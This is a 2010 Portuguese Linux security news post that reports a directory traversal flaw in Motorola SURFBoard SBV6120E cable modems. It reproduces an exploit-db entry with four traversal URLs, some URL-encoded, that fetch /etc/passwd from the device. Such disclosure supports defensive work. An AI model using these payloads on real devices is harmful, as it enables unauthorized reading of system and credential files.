Visite também: Viva o Linux · Dicas-L · NoticiasLinux · SoftwareLivre.org



» Login
Login:
Senha:

Se você ainda não possui uma conta, clique aqui.

Esqueci minha senha

[Notícia] Skavurska! Motorola SURFBoard Cable Modem Directory Traversal

Linux user
roberto_espreto
Notícia enviada por Roberto Soares (3spreto)

Encontrada recentemente uma vulnerabilidade que pode ser explorada nos modems Motorola SURFBoard através de "directory traversal", exibindo assim informações valiosas. Realizados os testes no modelo SBV6120E, Firmware Name: SBV6X2X-1.0.0.5-SCM-02-SHPC.

Data: 16/06/2010
[ Hits: 12260 ]

Skavurska! Motorola SURFBoard Cable Modem Directory Traversal

Abaixo o código-fonte do exploit.

# Exploit Title: Motorola SURFBoard Cable Modem Directory Traversal
# Date: 2010.06.03
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: Model name: SBV6120E, Firmware Name: SBV6X2X-1.0.0.5-SCM-02-SHPC
# Tested on: ^
# CVE: -
# Code :
The following urls get back the /etc/passwd file from the modem:

http://[IP]///etc/passwd <http://[ip]///etc/passwd>
http://[IP]/../../etc/passwd

http://[IP]/..%2f..%2fetc/passwd <http://[ip]/..%2f..%2fetc/passwd>
http://[IP]/%2e%2e/%2e%2e/etc/passwd

Fonte: http://www.exploit-db.com/exploits/12865/


Outras notícias deste autor
Nenhuma notícia encontrada.

Leitura recomendada
   Notícia Linux recomendada Negação de serviço no kernel Linux
   Notícia Linux recomendada SecurityTube - Vídeos sobre segurança
   Notícia Linux recomendada Até 50% de desconto para as últimas vagas do treinamento Investigação Forense Digital da 4Linux.
   Notícia Linux recomendada Microsoft corrige vulnerabilidades
   Notícia Linux recomendada Servidores Web do Backtrack-linux.org foram invadidos!!!

Comentários
Nenhum comentário foi encontrado.

Contribuir com comentário
  
Para executar esta ação você precisa estar logado no site, caso contrário, tudo o que for digitado será perdido.
Contribuir com: [ Artigo | Conf | Dica | Notícia ]
Responsáveis pelo site: Fábio Berbert de Paula / OYS Academy
Site hospedado por:

Segurança Linux

Site especializado em conteúdo de segurança para Linux.